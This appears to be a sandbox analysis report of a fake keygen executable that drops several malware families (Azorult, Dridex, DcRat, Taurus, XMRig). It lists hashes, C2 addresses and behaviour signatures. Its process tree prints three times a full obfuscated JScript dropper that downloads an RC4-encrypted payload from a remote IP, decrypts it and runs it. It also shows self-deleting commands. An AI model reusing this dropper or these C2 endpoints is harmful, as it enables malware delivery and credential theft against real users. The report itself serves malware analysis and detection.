Overview

overview

10

Static

static

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ฺฺ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows7_x64

10

Analysis

  • max time kernel
    1791s
  • max time network
    1801s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    03-04-2021 06:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe

  • Size

    5.4MB

  • MD5

    71e1b5c96e0b450768b799f4f2ba8c6a

  • SHA1

    d974040a5020d4132094f04d42edfb24c28b3c1a

  • SHA256

    16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2

  • SHA512

    96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc

Score
10/10
azorultdcratdridextaurus_stealerxmrig10111botnetfacebookdiscoveryevasioninfostealerloaderminerpersistencephishingratspywarestealertrojan

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

dridex

Botnet

10111

C2

210.65.244.183:8443

216.10.251.121:6601
rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detected facebook phishing page
    phishingfacebook
  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

    trojanstealertaurus_stealer
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

    botnetloader
  • XMRig Miner Payload 4 IoCs
    miner
  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 38 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2416
    • C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
      "C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1232
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              5⤵
                PID:1028
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:676
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
            keygen-step-3.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:368
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1448
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                5⤵
                • Runs ping.exe
                PID:1656
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
              4⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                5⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                PID:1352
                • C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe" 1 101
                  6⤵
                  • Executes dropped EXE
                  PID:1964
              • C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe
                "C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe" ll
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1236
                • C:\Users\Admin\AppData\Local\Temp\is-V3J1J.tmp\setups.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-V3J1J.tmp\setups.tmp" /SL5="$201B2,635399,250368,C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe" ll
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1620
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                    7⤵
                    • Modifies Internet Explorer Phishing Filter
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:884
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275457 /prefetch:2
                      8⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:1824
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTgyNTc2&bxQynoOuX&oa1n4=xH3QMrXYbRvFFYbfLf_KRqZbNU&s2ht4=zRGUKVxo2bk63PE5qpZDLGpbD1DB6gqV6AH16-t_d0erFOfQe5zUGwcgFin41eB1kXpar9iUWBzBKcgJTUqxHcMgkUqZGSQrU_ilmnx7IcIc9xlhLX4GVS_O4eVlkgvA5Tn6r7&IiiyhaaQNTA0NQ==" "2"
                        9⤵
                          PID:2840
                          • C:\Windows\SysWOW64\wscript.exe
                            wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTgyNTc2&bxQynoOuX&oa1n4=xH3QMrXYbRvFFYbfLf_KRqZbNU&s2ht4=zRGUKVxo2bk63PE5qpZDLGpbD1DB6gqV6AH16-t_d0erFOfQe5zUGwcgFin41eB1kXpar9iUWBzBKcgJTUqxHcMgkUqZGSQrU_ilmnx7IcIc9xlhLX4GVS_O4eVlkgvA5Tn6r7&IiiyhaaQNTA0NQ==" "2"
                            10⤵
                            • Blocklisted process makes network request
                            PID:2892
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c gg3fs.exe
                              11⤵
                              • Loads dropped DLL
                              PID:1820
                              • C:\Users\Admin\AppData\Local\Temp\gg3fs.exe
                                gg3fs.exe
                                12⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:2124
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275483 /prefetch:2
                        8⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1616
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTU0NTAx&ukob&s2ht4=YmKrSCJ2vfzSj2bCIEBjw8V7dTjvSgfdOLq1UbgC-jgeDLgYOmMxZC15E87etzkKNylafsJOG_h2JMglH_JeRR7I421n2nbIQc5kjzxLU7TRUye4dVlMU5g4Vn_3PEqLKrhF0B0Y0UgvKeZ0ipRvGUyTpNTlwsfOzRD9xq-2T9bdwn5Qd&oa1n4=x33QdfWfaRyPDojEM__dTaRGP0vYGViPxY2&NakntWFNTc3MA==" "2"
                          9⤵
                            PID:3124
                            • C:\Windows\SysWOW64\wscript.exe
                              wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTU0NTAx&ukob&s2ht4=YmKrSCJ2vfzSj2bCIEBjw8V7dTjvSgfdOLq1UbgC-jgeDLgYOmMxZC15E87etzkKNylafsJOG_h2JMglH_JeRR7I421n2nbIQc5kjzxLU7TRUye4dVlMU5g4Vn_3PEqLKrhF0B0Y0UgvKeZ0ipRvGUyTpNTlwsfOzRD9xq-2T9bdwn5Qd&oa1n4=x33QdfWfaRyPDojEM__dTaRGP0vYGViPxY2&NakntWFNTc3MA==" "2"
                              10⤵
                              • Blocklisted process makes network request
                              PID:3152
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c z5cw6.exe
                                11⤵
                                  PID:3224
                                  • C:\Users\Admin\AppData\Local\Temp\z5cw6.exe
                                    z5cw6.exe
                                    12⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:3260
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:668701 /prefetch:2
                            8⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2664
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDk2NTI3&HJKuULkm&s2ht4=vRGUWVxo2bk63PE5qpZDLGpbf1DBmgqVmAH16-t_d0erZOfQe5zUGweQFpzY1dUVkUoqqm30LUyRXOiZTX_BaFZwlB-ZaWF7I-jlmmnbJAJM9xlBWBv2JY_O4ZUVkgvA5Tn6r7&oa1n4=xHrQMrXYbRzFFYbfLf_KRqZbNU&UTkPdFMjEyNw==" "2""
                              9⤵
                                PID:2788
                                • C:\Windows\SysWOW64\wscript.exe
                                  wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDk2NTI3&HJKuULkm&s2ht4=vRGUWVxo2bk63PE5qpZDLGpbf1DBmgqVmAH16-t_d0erZOfQe5zUGweQFpzY1dUVkUoqqm30LUyRXOiZTX_BaFZwlB-ZaWF7I-jlmmnbJAJM9xlBWBv2JY_O4ZUVkgvA5Tn6r7&oa1n4=xHrQMrXYbRzFFYbfLf_KRqZbNU&UTkPdFMjEyNw==" "2""
                                  10⤵
                                  • Blocklisted process makes network request
                                  PID:2232
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c h9zmt.exe
                                    11⤵
                                    • Loads dropped DLL
                                    PID:1564
                                    • C:\Users\Admin\AppData\Local\Temp\h9zmt.exe
                                      h9zmt.exe
                                      12⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:2972
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:406557 /prefetch:2
                              8⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:2832
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:799805 /prefetch:2
                              8⤵
                              • Modifies Internet Explorer settings
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of SetWindowsHookEx
                              PID:1864
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe
                              "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1016
                              • C:\Users\Admin\AppData\Local\Temp\is-U7GON.tmp\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-U7GON.tmp\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.tmp" /SL5="$30370,61608034,798208,C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe"
                                9⤵
                                • Executes dropped EXE
                                • Drops startup file
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                PID:2340
                                • C:\Users\Admin\AppData\Local\vghd\bin\vghd.exe
                                  "C:\Users\Admin\AppData\Local\vghd\bin\vghd.exe" -fromSetup
                                  10⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2544
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=5030865361025916311 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=5030865361025916311 --renderer-client-id=3 --mojo-platform-channel-handle=1772 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:1860
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=12539584626415556446 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=12539584626415556446 --renderer-client-id=2 --mojo-platform-channel-handle=1752 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2216
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=8618911601537566506 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=8618911601537566506 --renderer-client-id=4 --mojo-platform-channel-handle=1804 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2352
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=13868008317195459732 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=13868008317195459732 --renderer-client-id=5 --mojo-platform-channel-handle=1816 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2264
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=10744385650040740973 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=10744385650040740973 --renderer-client-id=6 --mojo-platform-channel-handle=1828 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2392
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=1401645925065305749 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=1401645925065305749 --renderer-client-id=7 --mojo-platform-channel-handle=1840 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:1808
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=3819674613747793755 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=3819674613747793755 --renderer-client-id=8 --mojo-platform-channel-handle=1856 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2616
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=4662479919381697574 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=4662479919381697574 --renderer-client-id=9 --mojo-platform-channel-handle=2564 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:1844
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1496
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        5⤵
                          PID:1668
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            6⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:400
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
                        4⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        PID:2132
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                          5⤵
                            PID:2192
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                              6⤵
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2360
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Modifies data under HKEY_USERS
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2212
                          • C:\Users\Admin\AppData\Roaming\DD08.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\DD08.tmp.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2464
